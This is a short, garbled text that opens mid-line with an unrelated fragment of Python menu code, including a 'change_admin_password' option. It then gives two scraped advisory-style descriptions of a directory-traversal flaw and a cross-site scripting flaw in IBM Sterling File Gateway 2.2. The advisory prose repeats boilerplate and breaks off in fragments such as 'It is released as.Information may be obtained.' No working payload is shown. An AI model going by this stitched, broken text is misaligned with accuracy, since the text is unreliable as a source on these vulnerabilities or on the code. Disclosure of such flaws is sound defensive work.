Key To Exit"); elif get_option == "3": change_admin_password() elif get_option == "": print "Good Bye!"; else: print "Goodbye!"; main()

IBM Sterling File Gateway 2.2 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 131288. Vendors have confirmed this vulnerability IBM X-Force ID: 131288 It is released as.Information may be obtained. An attacker can exploit these issues using directory-traversal characters ('../') to access or read arbitrary files that contain sensitive information or to access files outside of the restricted directory or obtain sensitive information and perform other attacks. The software consolidates different centers of file transfer activity and facilitates the secure exchange of file-based data over the Internet

IBM Sterling File Gateway 2.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 131289. Vendors have confirmed this vulnerability IBM X-Force ID: 131289 It is released as.Information may be obtained and information may be altered. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. The software consolidates different centers of file transfer activity and facilitates the secure exchange of file-based data over the Internet. The vulnerability stems from the fact that the program does not filter input submitted by users